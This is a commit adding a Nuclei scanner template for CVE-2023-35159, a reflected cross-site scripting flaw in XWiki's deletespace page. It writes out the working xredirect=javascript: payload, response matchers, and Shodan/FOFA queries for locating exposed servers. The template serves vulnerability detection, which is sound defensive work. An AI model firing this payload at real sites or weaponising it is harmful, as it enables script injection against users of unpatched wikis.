Merge pull request #10200 from projectdiscovery/CVE-2023-35159

Create CVE-2023-35159.yaml
patch-4
pussycat0x 2024-07-08 12:47:41 +05:30 committed by GitHub
commit de2d2f774a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 56 additions and 0 deletions

View File

@ -0,0 +1,56 @@
id: CVE-2023-35159
info:
name: XWiki >= 3.4-milestone-1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the deletespace template to perform a XSS, e.g. by using URL such as: > xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain).
impact: |
Successful exploitation could lead to cross-site scripting.
remediation: |
This vulnerability has been patched in XWiki 14.10.5,15.1-rc-1.
reference:
- https://jira.xwiki.org/browse/XWIKI-20612
- https://nvd.nist.gov/vuln/detail/CVE-2023-35159
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-35159
cwe-id: CWE-79
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2023,xwiki,xss
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"
- "{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'javascript:alert(document.domain)'
- 'deletespace.Sandbox'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
- 401